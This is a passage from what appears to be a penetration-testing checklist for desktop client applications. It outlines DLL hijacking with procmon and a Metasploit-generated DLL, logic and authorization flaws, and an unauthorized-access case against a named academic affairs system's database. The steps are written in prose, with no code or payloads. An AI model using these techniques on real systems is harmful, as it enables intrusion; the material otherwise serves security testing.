6. The directories in the PATH variable.
The program may therefore load a malicious DLL placed by an attacker. Use procmon to find the DLLs the program loads and look for NAME NOT FOUND results. msf generates a malicious DLL that is placed at the location the program loads from; running the program then triggers the payload.
Case 0 - DLL hijacking (dvta)

Logic defects
The test points are the same as for the web.

Authorization and authentication defects
Registry key values; constructing the information returned by the authorization server.
Related reference: https://cloud.tencent.com/developer/article/1430899

Unauthorized access
Case 0 - Arbitrary operations on the Zhengfang Academic Affairs System database: the database can be taken over just by knowing its IP.